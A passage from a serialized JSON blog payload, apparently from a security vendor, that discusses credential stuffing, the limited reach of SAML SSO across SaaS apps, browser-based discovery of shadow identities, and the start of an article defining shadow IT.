IdP (Identity Provider) like Google Directory or Azure AD. Many others are using tools like Okta.",[],{},{"nodeType":235,"data":286110,"content":286111},{},[286112],{"nodeType":173,"value":286113,"marks":286114,"data":286115},"SSO limitations",[],{},{"nodeType":312,"data":286117,"content":286121},{"target":286118},{"sys":286119},{"id":286120,"type":317,"linkType":318},"5nXHrCukKQAz1aaQJ0bptB",[],{"nodeType":178,"data":286123,"content":286124},{},[286125],{"nodeType":173,"value":286126,"marks":286127,"data":286128},"There are a couple blockers to using SSO to solve all your identities and SaaS sprawl problems though:",[],{},{"nodeType":250,"data":286130,"content":286131},{},[286132,286165,286203],{"nodeType":254,"data":286133,"content":286134},{},[286135,286142],{"nodeType":178,"data":286136,"content":286137},{},[286138],{"nodeType":173,"value":286139,"marks":286140,"data":286141},"Employees can’t integrate their apps with SSO themselves",[],{},{"nodeType":250,"data":286143,"content":286144},{},[286145,286155],{"nodeType":254,"data":286146,"content":286147},{},[286148],{"nodeType":178,"data":286149,"content":286150},{},[286151],{"nodeType":173,"value":286152,"marks":286153,"data":286154},"SSO isn’t like multi factor authentication (MFA), employees can’t just turn it on. ",[],{},{"nodeType":254,"data":286156,"content":286157},{},[286158],{"nodeType":178,"data":286159,"content":286160},{},[286161],{"nodeType":173,"value":286162,"marks":286163,"data":286164},"Employees aren’t incentivized to get IT approval and work with them on getting their work apps integrated with SSO",[],{},{"nodeType":254,"data":286166,"content":286167},{},[286168,286175],{"nodeType":178,"data":286169,"content":286170},{},[286171],{"nodeType":173,"value":286172,"marks":286173,"data":286174},"SAML SSO won’t help you get visibility into which apps employees are using",[],{},{"nodeType":250,"data":286176,"content":286177},{},[286178,286193],{"nodeType":254,"data":286179,"content":286180},{},[286181],{"nodeType":178,"data":286182,"content":286183},{},[286184,286189],{"nodeType":173,"value":286185,"marks":286186,"data":286188},"SSO is not going to help you discover which apps employees are using",[286187],{"type":370},{},{"nodeType":173,"value":286190,"marks":286191,"data":286192}," - and that haven’t been integrated with SAML. ",[],{},{"nodeType":254,"data":286194,"content":286195},{},[286196],{"nodeType":178,"data":286197,"content":286198},{},[286199],{"nodeType":173,"value":286200,"marks":286201,"data":286202},"But, once you discover them and determine they support SAML, you should absolutely integrate them with your solution (if it makes sense to pay for the top-end license fees). ",[],{},{"nodeType":254,"data":286204,"content":286205},{},[286206,286213],{"nodeType":178,"data":286207,"content":286208},{},[286209],{"nodeType":173,"value":286210,"marks":286211,"data":286212},"SSO isn’t available for most of the apps employees are using",[],{},{"nodeType":250,"data":286214,"content":286215},{},[286216],{"nodeType":254,"data":286217,"content":286218},{},[286219],{"nodeType":178,"data":286220,"content":286221},{},[286222],{"nodeType":173,"value":286223,"marks":286224,"data":286225},"When we reviewed 500 of the most popular apps that Push supports, we found that: ",[],{},{"nodeType":3769,"data":286227,"content":286228},{},[286229],{"nodeType":178,"data":286230,"content":286231},{},[286232],{"nodeType":173,"value":286233,"marks":286234,"data":286235},"Only around 1 out of 3 of apps even claim to support SAML and, of those, very few make it available on anything less than their top enterprise tiers",[],{},{"nodeType":312,"data":286237,"content":286241},{"target":286238},{"sys":286239},{"id":286240,"type":317,"linkType":318},"56nd8Na4I0efwOf9pfmB8s",[],{"nodeType":235,"data":286243,"content":286244},{},[286245],{"nodeType":173,"value":286246,"marks":286247,"data":286248},"New apps less likely to support SAML SSO than enterprise apps",[],{},{"nodeType":178,"data":286250,"content":286251},{},[286252],{"nodeType":173,"value":286253,"marks":286254,"data":286255},"We also noticed that the more modern, newer apps were less likely to offer SAML support than the larger, more established business apps. So if your strategy is to block access to any app that doesn’t offer SSO integrations, you’re going to have to block the majority of self-adopted apps your employees are using. This means employees will soon start trying to hide these newer apps from your security team.",[],{},{"nodeType":169,"data":286257,"content":286258},{},[286259],{"nodeType":173,"value":286260,"marks":286261,"data":286262},"Prevent credential stuffing attacks",[],{},{"nodeType":178,"data":286264,"content":286265},{},[286266],{"nodeType":173,"value":286267,"marks":286268,"data":286269},"While most of us agree that going SAML and/or passwordless is the goal, we will still need to find out about these identities being created so we can get them protected behind modern authentication mechanisms. ",[],{},{"nodeType":178,"data":286271,"content":286272},{},[286273],{"nodeType":173,"value":286274,"marks":286275,"data":286276},"In the meantime, it’s not even going to be practical to do that as these methods lack broad support, whether you can discover them or not. So, we’re going to need a solution that covers all the not-(or not yet-) SSO identities as well. ",[],{},{"nodeType":178,"data":286278,"content":286279},{},[286280],{"nodeType":173,"value":286281,"marks":286282,"data":286283},"This isn’t the end of the world, since using strong, unique passwords, coupled with multi factor authentication (MFA), are very effective identity and access controls that ensure only legitimate users gain access to an identity.",[],{},{"nodeType":235,"data":286285,"content":286286},{},[286287],{"nodeType":173,"value":286288,"marks":286289,"data":286290},"Implement sensible controls to prevent credential stuffing attacks",[],{},{"nodeType":178,"data":286292,"content":286293},{},[286294],{"nodeType":173,"value":286295,"marks":286296,"data":286297},"To stop these  attacks (and a whole host of other attacks like brute force attacks to boot) you will need to implement the following controls on all accounts (not just the ones in your IdP or managed identity platform):",[],{},{"nodeType":312,"data":286299,"content":286303},{"target":286300},{"sys":286301},{"id":286302,"type":317,"linkType":318},"JU64Zj7eiqS1s5OfWmZyo",[],{"nodeType":235,"data":286305,"content":286306},{},[286307],{"nodeType":173,"value":286308,"marks":286309,"data":286310},"You need to know not just what apps employees are using, but also how they’re accessing them",[],{},{"nodeType":178,"data":286312,"content":286313},{},[286314],{"nodeType":173,"value":286315,"marks":286316,"data":286317},"It’s useful to note from the requirements that you must have visibility of cloud identities being created, the protocols they use and which app or IdP they exist on - not just which employee is accessing a SaaS website.",[],{},{"nodeType":178,"data":286319,"content":286320},{},[286321],{"nodeType":173,"value":286322,"marks":286323,"data":286324},"There’s only one place where we can get data about who is using which SaaS apps, as well as the ability to inspect passwords and check MFA status for each user…",[],{},{"nodeType":178,"data":286326,"content":286327},{},[286328],{"nodeType":173,"value":286329,"marks":286330,"data":286331},"…The employee’s browsers.",[],{},{"nodeType":235,"data":286333,"content":286334},{},[286335],{"nodeType":173,"value":286336,"marks":286337,"data":286338},"Benefits of using the browser as a shadow identity and shadow IT discovery method",[],{},{"nodeType":178,"data":286340,"content":286341},{},[286342],{"nodeType":173,"value":286343,"marks":286344,"data":286345},"This is the reason we have chosen to build our solution using a browser extension. It allows us to:",[],{},{"nodeType":250,"data":286347,"content":286348},{},[286349,286359,286369,286379],{"nodeType":254,"data":286350,"content":286351},{},[286352],{"nodeType":178,"data":286353,"content":286354},{},[286355],{"nodeType":173,"value":286356,"marks":286357,"data":286358},"Directly observe each identity’s authentication mechanism (SAML, OICD, or local password),",[],{},{"nodeType":254,"data":286360,"content":286361},{},[286362],{"nodeType":178,"data":286363,"content":286364},{},[286365],{"nodeType":173,"value":286366,"marks":286367,"data":286368},"Enforce strong user credentials. When passwords are used, assess their strength and whether they are being shared or reused across multiple accounts, and ",[],{},{"nodeType":254,"data":286370,"content":286371},{},[286372],{"nodeType":178,"data":286373,"content":286374},{},[286375],{"nodeType":173,"value":286376,"marks":286377,"data":286378},"Check if each password has already shown up in breached credential dumps, and",[],{},{"nodeType":254,"data":286380,"content":286381},{},[286382],{"nodeType":178,"data":286383,"content":286384},{},[286385],{"nodeType":173,"value":286386,"marks":286387,"data":286388},"Allow security teams to fix any accounts that don’t meet their policies or expectations.",[],{},{"nodeType":169,"data":286390,"content":286391},{},[286392],{"nodeType":173,"value":40632,"marks":286393,"data":286394},[],{},{"nodeType":178,"data":286396,"content":286397},{},[286398,286402,286411,286415,286423],{"nodeType":173,"value":286399,"marks":286400,"data":286401},"We’ve written in much more detail about why discovering employee identities and SaaS use through the browser makes the most sense in this very biased (but reasonable!) ",[],{},{"nodeType":1698,"data":286403,"content":286406},{"target":286404},{"sys":286405},{"id":273937,"type":317,"linkType":318},[286407],{"nodeType":173,"value":148689,"marks":286408,"data":286410},[286409],{"type":194},{},{"nodeType":173,"value":286412,"marks":286413,"data":286414},". Give it a read and have a think about it. Hell, come tell us why we’re wrong on ",[],{},{"nodeType":186,"data":286416,"content":286418},{"uri":286417},"https://www.linkedin.com/company/30685750",[286419],{"nodeType":173,"value":117876,"marks":286420,"data":286422},[286421],{"type":194},{},{"nodeType":173,"value":286424,"marks":286425,"data":286426},", we’d love to discuss the pros and cons of our approach in more detail.",[],{},{"nodeType":312,"data":286428,"content":286431},{"target":286429},{"sys":286430},{"id":169040,"type":317,"linkType":318},[],{"nodeType":178,"data":286433,"content":286434},{},[286435],{"nodeType":173,"value":37,"marks":286436,"data":286437},[],{},{"entries":286439},{"inline":286440,"hyperlink":286441,"block":286446},[],[286442],{"sys":286443,"__typename":1528,"title":286444,"slug":286445},{"id":273937},"Want to discover the full extent of your SaaS sprawl? Embrace browser extensions ","want-to-discover-the-full-extent-of-your-saas-sprawl-embrace-browser",[286447,286454,286461,286467,286474,286480],{"sys":286448,"__typename":5345,"title":285870,"caption":286449,"layoutMode":118,"file":286450},{"id":285877},"Credential stuffing, defined",{"url":286451,"width":286452,"height":286453},"https://images.ctfassets.net/y1cdw1ablpvd/2fRpR48CojRpuKC9szltbE/655d9755e42533589162646798f171cd/Screenshot_2023-09-12_at_1.29.25_PM.png",1754,982,{"sys":286455,"__typename":5345,"title":286456,"caption":286457,"layoutMode":112585,"file":286458},{"id":285904},"Supply chain attack timeline - PLG"," An example of a credential stuffing attack to compromise cloud identities",{"url":286459,"width":5358,"height":286460},"https://images.ctfassets.net/y1cdw1ablpvd/4dw9aikRRKmga5pVWBAXWU/0649644e0f0aaf29510738307546d5b1/image16.png",1104,{"sys":286462,"__typename":5345,"title":286113,"caption":286463,"layoutMode":118,"file":286464},{"id":286120},"SSO helps, but isn't a bulletproof solution",{"url":286465,"width":286466,"height":65005},"https://images.ctfassets.net/y1cdw1ablpvd/6G4XBWxaKdDRqEsWC3Pzjr/6aed882752f140cc0df5dbc092a378cb/image2.png",1758,{"sys":286468,"__typename":5345,"title":286469,"caption":286470,"layoutMode":112585,"file":286471},{"id":286240},"SSO only available for a small subset of apps","SSO is the gold standard, but a lack of universal support means we'll still need to deal with passwords for the foreseeable future.",{"url":286472,"width":60003,"height":286473},"https://images.ctfassets.net/y1cdw1ablpvd/7FDQf7atru96r1DRAjb52k/213136ebecccb073334878befc0c3dc8/image12.png",1002,{"sys":286475,"__typename":5345,"title":286476,"caption":286477,"layoutMode":112585,"file":286478},{"id":286302},"Controls to prevent credential stuffing attacks - PLG","Controls to prevent credential stuffing attacks",{"url":286479,"width":5358,"height":142414},"https://images.ctfassets.net/y1cdw1ablpvd/7b0CDfnOLHjOAZgp9UMzlZ/8bdf95a1e66162f155c22db703f40048/image16.png",{"sys":286481,"__typename":15269,"type":112637,"ctaText":192192,"buttonLabel":192193,"buttonColour":15273,"buttonUrl":118},{"id":169040},"content:blog:what-is-credential-stuffing.json","blog/what-is-credential-stuffing.json","blog/what-is-credential-stuffing",{"_path":286486,"_dir":1500,"_draft":6,"_partial":6,"_locale":37,"sys":286487,"ogImage":118,"summary":286489,"title":274148,"subtitle":118,"metaTitle":286500,"synopsis":274149,"hashTags":118,"publishedDate":274150,"slug":274151,"tagsCollection":286501,"relatedBlogPostsCollection":286507,"authorsCollection":287714,"content":287718,"_id":288193,"_type":5439,"_source":5440,"_file":288194,"_stem":288195,"_extension":5439},"/blog/what-are-shadow-identities",{"id":273639,"publishedAt":286488},"2025-01-15T14:31:02.984Z",{"json":286490},{"data":286491,"content":286492,"nodeType":165},{},[286493],{"data":286494,"content":286495,"nodeType":178},{},[286496],{"data":286497,"marks":286498,"value":286499,"nodeType":173},{},[],"In this article, we define shadow identities and shadow IDs and guide readers on how to find and secure them to reduce the risk.","Manage the risk of shadow identities",{"items":286502},[286503,286505],{"sys":286504,"name":274157},{"id":274156},{"sys":286506,"name":26133},{"id":26132},{"items":286508},[286509,287267],{"__typename":1528,"sys":286510,"content":286511,"title":284281,"synopsis":284282,"hashTags":118,"publishedDate":284283,"slug":284284,"tagsCollection":287257,"authorsCollection":287263},{"id":273726},{"json":286512},{"nodeType":165,"data":286513,"content":286514},{},[286515,286521,286527,286532,286560,286566,286572,286588,286594,286600,286606,286622,286627,286633,286644,286650,286656,286662,286667,286688,286694,286700,286706,286712,286718,286724,286740,286747,286760,286766,286771,286789,286814,286827,286849,286855,286861,286867,286873,286879,286885,286891,286938,286944,286972,287008,287077,287083,287089,287095,287101,287107,287113,287119,287125,287130,287136,287142,287160,287166,287172,287178,287183,287189,287195,287201,287207,287228,287234,287239],{"nodeType":178,"data":286516,"content":286517},{},[286518],{"nodeType":173,"value":283440,"marks":286519,"data":286520},[],{},{"nodeType":178,"data":286522,"content":286523},{},[286524],{"nodeType":173,"value":283447,"marks":286525,"data":286526},[],{},{"nodeType":312,"data":286528,"content":286531},{"target":286529},{"sys":286530},{"id":280733,"type":317,"linkType":318},[],{"nodeType":178,"data":286533,"content":286534},{},[286535,286538,286546,286549,286557],{"nodeType":173,"value":283459,"marks":286536,"data":286537},[],{},{"nodeType":1698,"data":286539,"content":286542},{"target":286540},{"sys":286541},{"id":283466,"type":317,"linkType":318},[286543],{"nodeType":173,"value":283469,"marks":286544,"data":286545},[],{},{"nodeType":173,"value":283473,"marks":286547,"data":286548},[],{},{"nodeType":1698,"data":286550,"content":286553},{"target":286551},{"sys":286552},{"id":282056,"type":317,"linkType":318},[286554],{"nodeType":173,"value":283482,"marks":286555,"data":286556},[],{},{"nodeType":173,"value":283486,"marks":286558,"data":286559},[],{},{"nodeType":169,"data":286561,"content":286562},{},[286563],{"nodeType":173,"value":283493,"marks":286564,"data":286565},[],{},{"nodeType":178,"data":286567,"content":286568},{},[286569],{"nodeType":173,"value":283500,"marks":286570,"data":286571},[],{},{"nodeType":178,"data":286573,"content":286574},{},[286575,286578,286585],{"nodeType":173,"value":283507,"marks":286576,"data":286577},[],{},{"nodeType":186,"data":286579,"content":286580},{"uri":280989},[286581],{"nodeType":173,"value":283514,"marks":286582,"data":286584},[286583],{"type":194},{},{"nodeType":173,"value":283519,"marks":286586,"data":286587},[],{},{"nodeType":235,"data":286589,"content":286590},{},[286591],{"nodeType":173,"value":283526,"marks":286592,"data":286593},[],{},{"nodeType":178,"data":286595,"content":286596},{},[286597],{"nodeType":173,"value":283533,"marks":286598,"data":286599},[],{},{"nodeType":178,"data":286601,"content":286602},{},[286603],{"nodeType":173,"value":283540,"marks":286604,"data":286605},[],{},{"nodeType":178,"data":286607,"content":286608},{},[286609,286612,286619],{"nodeType":173,"value":283547,"marks":286610,"data":286611},[],{},{"nodeType":186,"data":286613,"content":286614},{"uri":280989},[286615],{"nodeType":173,"value":283554,"marks":286616,"data":286618},[286617],{"type":194},{},{"nodeType":173,"value":283559,"marks":286620,"data":286621},[],{},{"nodeType":312,"data":286623,"content":286626},{"target":286624},{"sys":286625},{"id":281011,"type":317,"linkType":318},[],{"nodeType":178,"data":286628,"content":286629},{},[286630],{"nodeType":173,"value":283571,"marks":286631,"data":286632},[],{},{"nodeType":178,"data":286634,"content":286635},{},[286636,286641],{"nodeType":173,"value":283578,"marks":286637,"data":286640},[286638,286639],{"type":1646},{"type":370},{},{"nodeType":173,"value":283584,"marks":286642,"data":286643},[],{},{"nodeType":178,"data":286645,"content":286646},{},[286647],{"nodeType":173,"value":283591,"marks":286648,"data":286649},[],{},{"nodeType":169,"data":286651,"content":286652},{},[286653],{"nodeType":173,"value":283598,"marks":286654,"data":286655},[],{},{"nodeType":178,"data":286657,"content":286658},{},[286659],{"nodeType":173,"value":283605,"marks":286660,"data":286661},[],{},{"nodeType":312,"data":286663,"content":286666},{"target":286664},{"sys":286665},{"id":283612,"type":317,"linkType":318},[],{"nodeType":246189,"data":286668,"content":286669},{},[286670,286679],{"nodeType":254,"data":286671,"content":286672},{},[286673],{"nodeType":178,"data":286674,"content":286675},{},[286676],{"nodeType":173,"value":283624,"marks":286677,"data":286678},[],{},{"nodeType":254,"data":286680,"content":286681},{},[286682],{"nodeType":178,"data":286683,"content":286684},{},[286685],{"nodeType":173,"value":283634,"marks":286686,"data":286687},[],{},{"nodeType":235,"data":286689,"content":286690},{},[286691],{"nodeType":173,"value":283641,"marks":286692,"data":286693},[],{},{"nodeType":178,"data":286695,"content":286696},{},[286697],{"nodeType":173,"value":283648,"marks":286698,"data":286699},[],{},{"nodeType":178,"data":286701,"content":286702},{},[286703],{"nodeType":173,"value":283655,"marks":286704,"data":286705},[],{},{"nodeType":178,"data":286707,"content":286708},{},[286709],{"nodeType":173,"value":283662,"marks":286710,"data":286711},[],{},{"nodeType":235,"data":286713,"content":286714},{},[286715],{"nodeType":173,"value":283669,"marks":286716,"data":286717},[],{},{"nodeType":178,"data":286719,"content":286720},{},[286721],{"nodeType":173,"value":283676,"marks":286722,"data":286723},[],{},{"nodeType":246189,"data":286725,"content":286726},{},[286727],{"nodeType":254,"data":286728,"content":286729},{},[286730],{"nodeType":178,"data":286731,"content":286732},{},[286733,286737],{"nodeType":173,"value":283689,"marks":286734,"data":286736},[286735],{"type":370},{},{"nodeType":173,"value":283694,"marks":286738,"data":286739},[],{},{"nodeType":178,"data":286741,"content":286742},{},[286743],{"nodeType":173,"value":283701,"marks":286744,"data":286746},[286745],{"type":370},{},{"nodeType":178,"data":286748,"content":286749},{},[286750,286753,286757],{"nodeType":173,"value":283709,"marks":286751,"data":286752},[],{},{"nodeType":173,"value":283713,"marks":286754,"data":286756},[286755],{"type":1646},{},{"nodeType":173,"value":283718,"marks":286758,"data":286759},[],{},{"nodeType":178,"data":286761,"content":286762},{},[286763],{"nodeType":173,"value":283725,"marks":286764,"data":286765},[],{},{"nodeType":312,"data":286767,"content":286770},{"target":286768},{"sys":286769},{"id":283732,"type":317,"linkType":318},[],{"nodeType":178,"data":286772,"content":286773},{},[286774,286777,286786],{"nodeType":173,"value":283738,"marks":286775,"data":286776},[],{},{"nodeType":1698,"data":286778,"content":286781},{"target":286779},{"sys":286780},{"id":283745,"type":317,"linkType":318},[286782],{"nodeType":173,"value":28052,"marks":286783,"data":286785},[286784],{"type":194},{},{"nodeType":173,"value":283752,"marks":286787,"data":286788},[],{},{"nodeType":178,"data":286790,"content":286791},{},[286792,286795,286799,286802,286811],{"nodeType":173,"value":144009,"marks":286793,"data":286794},[],{},{"nodeType":173,"value":283762,"marks":286796,"data":286798},[286797],{"type":370},{},{"nodeType":173,"value":283767,"marks":286800,"data":286801},[],{},{"nodeType":1698,"data":286803,"content":286806},{"target":286804},{"sys":286805},{"id":273995,"type":317,"linkType":318},[286807],{"nodeType":173,"value":28052,"marks":286808,"data":286810},[286809],{"type":194},{},{"nodeType":173,"value":1477,"marks":286812,"data":286813},[],{},{"nodeType":178,"data":286815,"content":286816},{},[286817,286820,286824],{"nodeType":173,"value":283786,"marks":286818,"data":286819},[],{},{"nodeType":173,"value":283790,"marks":286821,"data":286823},[286822],{"type":370},{},{"nodeType":173,"value":283795,"marks":286825,"data":286826},[],{},{"nodeType":178,"data":286828,"content":286829},{},[286830,286833,286842,286846],{"nodeType":173,"value":283802,"marks":286831,"data":286832},[],{},{"nodeType":1698,"data":286834,"content":286837},{"target":286835},{"sys":286836},{"id":283809,"type":317,"linkType":318},[286838],{"nodeType":173,"value":283812,"marks":286839,"data":286841},[286840],{"type":194},{},{"nodeType":173,"value":3107,"marks":286843,"data":286845},[286844],{"type":370},{},{"nodeType":173,"value":283821,"marks":286847,"data":286848},[],{},{"nodeType":169,"data":286850,"content":286851},{},[286852],{"nodeType":173,"value":283828,"marks":286853,"data":286854},[],{},{"nodeType":178,"data":286856,"content":286857},{},[286858],{"nodeType":173,"value":283835,"marks":286859,"data":286860},[],{},{"nodeType":178,"data":286862,"content":286863},{},[286864],{"nodeType":173,"value":283842,"marks":286865,"data":286866},[],{},{"nodeType":178,"data":286868,"content":286869},{},[286870],{"nodeType":173,"value":283849,"marks":286871,"data":286872},[],{},{"nodeType":178,"data":286874,"content":286875},{},[286876],{"nodeType":173,"value":283856,"marks":286877,"data":286878},[],{},{"nodeType":169,"data":286880,"content":286881},{},[286882],{"nodeType":173,"value":283863,"marks":286883,"data":286884},[],{},{"nodeType":178,"data":286886,"content":286887},{},[286888],{"nodeType":173,"value":283870,"marks":286889,"data":286890},[],{},{"nodeType":250,"data":286892,"content":286893},{},[286894,286916],{"nodeType":254,"data":286895,"content":286896},{},[286897,286904],{"nodeType":178,"data":286898,"content":286899},{},[286900],{"nodeType":173,"value":283883,"marks":286901,"data":286903},[286902],{"type":370},{},{"nodeType":250,"data":286905,"content":286906},{},[286907],{"nodeType":254,"data":286908,"content":286909},{},[286910],{"nodeType":178,"data":286911,"content":286912},{},[286913],{"nodeType":173,"value":283897,"marks":286914,"data":286915},[],{},{"nodeType":254,"data":286917,"content":286918},{},[286919,286926],{"nodeType":178,"data":286920,"content":286921},{},[286922],{"nodeType":173,"value":283907,"marks":286923,"data":286925},[286924],{"type":370},{},{"nodeType":250,"data":286927,"content":286928},{},[286929],{"nodeType":254,"data":286930,"content":286931},{},[286932],{"nodeType":178,"data":286933,"content":286934},{},[286935],{"nodeType":173,"value":283921,"marks":286936,"data":286937},[],{},{"nodeType":178,"data":286939,"content":286940},{},[286941],{"nodeType":173,"value":283928,"marks":286942,"data":286943},[],{},{"nodeType":250,"data":286945,"content":286946},{},[286947],{"nodeType":254,"data":286948,"content":286949},{},[286950,286960],{"nodeType":178,"data":286951,"content":286952},{},[286953,286957],{"nodeType":173,"value":283941,"marks":286954,"data":286956},[286955],{"type":370},{},{"nodeType":173,"value":197,"marks":286958,"data":286959},[],{},{"nodeType":250,"data":286961,"content":286962},{},[286963],{"nodeType":254,"data":286964,"content":286965},{},[286966],{"nodeType":178,"data":286967,"content":286968},{},[286969],{"nodeType":173,"value":283958,"marks":286970,"data":286971},[],{},{"nodeType":178,"data":286973,"content":286974},{},[286975,286978,286985,286988,286995,286998,287005],{"nodeType":173,"value":283965,"marks":286976,"data":286977},[],{},{"nodeType":186,"data":286979,"content":286980},{"uri":281153},[286981],{"nodeType":173,"value":281156,"marks":286982,"data":286984},[286983],{"type":194},{},{"nodeType":173,"value":2936,"marks":286986,"data":286987},[],{},{"nodeType":186,"data":286989,"content":286990},{"uri":281165},[286991],{"nodeType":173,"value":211167,"marks":286992,"data":286994},[286993],{"type":194},{},{"nodeType":173,"value":2936,"marks":286996,"data":286997},[],{},{"nodeType":186,"data":286999,"content":287000},{"uri":281176},[287001],{"nodeType":173,"value":281179,"marks":287002,"data":287004},[287003],{"type":194},{},{"nodeType":173,"value":281184,"marks":287006,"data":287007},[],{},{"nodeType":250,"data":287009,"content":287010},{},[287011,287033,287055],{"nodeType":254,"data":287012,"content":287013},{},[287014,287021],{"nodeType":178,"data":287015,"content":287016},{},[287017],{"nodeType":173,"value":284008,"marks":287018,"data":287020},[287019],{"type":370},{},{"nodeType":250,"data":287022,"content":287023},{},[287024],{"nodeType":254,"data":287025,"content":287026},{},[287027],{"nodeType":178,"data":287028,"content":287029},{},[287030],{"nodeType":173,"value":284022,"marks":287031,"data":287032},[],{},{"nodeType":254,"data":287034,"content":287035},{},[287036,287043],{"nodeType":178,"data":287037,"content":287038},{},[287039],{"nodeType":173,"value":284032,"marks":287040,"data":287042},[287041],{"type":370},{},{"nodeType":250,"data":287044,"content":287045},{},[287046],{"nodeType":254,"data":287047,"content":287048},{},[287049],{"nodeType":178,"data":287050,"content":287051},{},[287052],{"nodeType":173,"value":284046,"marks":287053,"data":287054},[],{},{"nodeType":254,"data":287056,"content":287057},{},[287058,287065],{"nodeType":178,"data":287059,"content":287060},{},[287061],{"nodeType":173,"value":284056,"marks":287062,"data":287064},[287063],{"type":370},{},{"nodeType":250,"data":287066,"content":287067},{},[287068],{"nodeType":254,"data":287069,"content":287070},{},[287071],{"nodeType":178,"data":287072,"content":287073},{},[287074],{"nodeType":173,"value":284070,"marks":287075,"data":287076},[],{},{"nodeType":178,"data":287078,"content":287079},{},[287080],{"nodeType":173,"value":284077,"marks":287081,"data":287082},[],{},{"nodeType":169,"data":287084,"content":287085},{},[287086],{"nodeType":173,"value":284084,"marks":287087,"data":287088},[],{},{"nodeType":178,"data":287090,"content":287091},{},[287092],{"nodeType":173,"value":284091,"marks":287093,"data":287094},[],{},{"nodeType":235,"data":287096,"content":287097},{},[287098],{"nodeType":173,"value":284098,"marks":287099,"data":287100},[],{},{"nodeType":178,"data":287102,"content":287103},{},[287104],{"nodeType":173,"value":284105,"marks":287105,"data":287106},[],{},{"nodeType":178,"data":287108,"content":287109},{},[287110],{"nodeType":173,"value":284112,"marks":287111,"data":287112},[],{},{"nodeType":178,"data":287114,"content":287115},{},[287116],{"nodeType":173,"value":284119,"marks":287117,"data":287118},[],{},{"nodeType":178,"data":287120,"content":287121},{},[287122],{"nodeType":173,"value":284126,"marks":287123,"data":287124},[],{},{"nodeType":312,"data":287126,"content":287129},{"target":287127},{"sys":287128},{"id":284133,"type":317,"linkType":318},[],{"nodeType":178,"data":287131,"content":287132},{},[287133],{"nodeType":173,"value":284139,"marks":287134,"data":287135},[],{},{"nodeType":178,"data":287137,"content":287138},{},[287139],{"nodeType":173,"value":284146,"marks":287140,"data":287141},[],{},{"nodeType":178,"data":287143,"content":287144},{},[287145,287148,287157],{"nodeType":173,"value":284153,"marks":287146,"data":287147},[],{},{"nodeType":1698,"data":287149,"content":287152},{"target":287150},{"sys":287151},{"id":281802,"type":317,"linkType":318},[287153],{"nodeType":173,"value":28052,"marks":287154,"data":287156},[287155],{"type":194},{},{"nodeType":173,"value":284166,"marks":287158,"data":287159},[],{},{"nodeType":169,"data":287161,"content":287162},{},[287163],{"nodeType":173,"value":284173,"marks":287164,"data":287165},[],{},{"nodeType":178,"data":287167,"content":287168},{},[287169],{"nodeType":173,"value":284180,"marks":287170,"data":287171},[],{},{"nodeType":178,"data":287173,"content":287174},{},[287175],{"nodeType":173,"value":284187,"marks":287176,"data":287177},[],{},{"nodeType":312,"data":287179,"content":287182},{"target":287180},{"sys":287181},{"id":284194,"type":317,"linkType":318},[],{"nodeType":178,"data":287184,"content":287185},{},[287186],{"nodeType":173,"value":284200,"marks":287187,"data":287188},[],{},{"nodeType":169,"data":287190,"content":287191},{},[287192],{"nodeType":173,"value":284207,"marks":287193,"data":287194},[],{},{"nodeType":178,"data":287196,"content":287197},{},[287198],{"nodeType":173,"value":284214,"marks":287199,"data":287200},[],{},{"nodeType":178,"data":287202,"content":287203},{},[287204],{"nodeType":173,"value":284221,"marks":287205,"data":287206},[],{},{"nodeType":250,"data":287208,"content":287209},{},[287210,287219],{"nodeType":254,"data":287211,"content":287212},{},[287213],{"nodeType":178,"data":287214,"content":287215},{},[287216],{"nodeType":173,"value":284234,"marks":287217,"data":287218},[],{},{"nodeType":254,"data":287220,"content":287221},{},[287222],{"nodeType":178,"data":287223,"content":287224},{},[287225],{"nodeType":173,"value":284244,"marks":287226,"data":287227},[],{},{"nodeType":178,"data":287229,"content":287230},{},[287231],{"nodeType":173,"value":284251,"marks":287232,"data":287233},[],{},{"nodeType":312,"data":287235,"content":287238},{"target":287236},{"sys":287237},{"id":284258,"type":317,"linkType":318},[],{"nodeType":178,"data":287240,"content":287241},{},[287242,287245,287254],{"nodeType":173,"value":284264,"marks":287243,"data":287244},[],{},{"nodeType":1698,"data":287246,"content":287249},{"target":287247},{"sys":287248},{"id":284271,"type":317,"linkType":318},[287250],{"nodeType":173,"value":284274,"marks":287251,"data":287253},[287252],{"type":194},{},{"nodeType":173,"value":1477,"marks":287255,"data":287256},[],{},{"items":287258},[287259,287261],{"sys":287260,"name":26133},{"id":26132},{"sys":287262,"name":26137},{"id":26136},{"items":287264},[287265],{"fullName":273632,"firstName":273633,"jobTitle":273634,"profilePicture":287266},{"url":273636},{"__typename":1528,"sys":287268,"content":287270,"title":287700,"synopsis":287701,"hashTags":118,"publishedDate":287702,"slug":287703,"tagsCollection":287704,"authorsCollection":287710},{"id":287269},"PFohPDnjNsdWymehsCvV6",{"json":287271},{"nodeType":165,"data":287272,"content":287273},{},[287274,287280,287287,287294,287301,287308,287315,287322,287329,287336,287343,287350,287357,287363,287370,287377,287384,287391,287398,287405,287412,287419,287426,287433,287440,287447,287453,287460,287480,287487,287494,287501,287508,287515,287522,287529,287536,287543,287559,287575,287582,287589,287596,287603,287610,287617,287624,287631,287638,287645,287652,287659,287666,287673,287680],{"nodeType":169,"data":287275,"content":287276},{},[287277],{"nodeType":173,"value":258287,"marks":287278,"data":287279},[],{},{"nodeType":178,"data":287281,"content":287282},{},[287283],{"nodeType":173,"value":287284,"marks":287285,"data":287286},"SaaS applications have made it incredibly easy for users to quickly sign up and adopt their tools independently. As a result, employees are signing up for the tools they need on their own, without IT approval.  This is a great thing as it allows businesses to embrace innovation and employees to move quickly and be more productive. But the cost of this digital transformation is the emergence of shadow IT. ",[],{},{"nodeType":178,"data":287288,"content":287289},{},[287290],{"nodeType":173,"value":287291,"marks":287292,"data":287293},"So, what exactly is shadow IT? ",[],{},{"nodeType":178,"data":287295,"content":287296},{},[287297],{"nodeType":173,"value":287298,"marks":287299,"data":287300},"In this article, we’ll define shadow IT and shadow SaaS and talk through some of the serious security risks associated with it and give some actionable guidance on how to manage both shadow IT and its risks. ",[],{},{"nodeType":178,"data":287302,"content":287303},{},[287304],{"nodeType":173,"value":287305,"marks":287306,"data":287307},"We’ll be focusing primarily on shadow SaaS, since this is a newer area that organizations need to address with new security methods, policies and tools. ",[],{},{"nodeType":169,"data":287309,"content":287310},{},[287311],{"nodeType":173,"value":287312,"marks":287313,"data":287314},"What is shadow IT?",[],{},{"nodeType":178,"data":287316,"content":287317},{},[287318],{"nodeType":173,"value":287319,"marks":287320,"data":287321},"Shadow IT is the use of technology, software, applications, or devices within an organization that hasn’t been explicitly approved or given oversight from IT and/or security teams. Usually, individual employees or teams have adopted these tools to streamline processes, 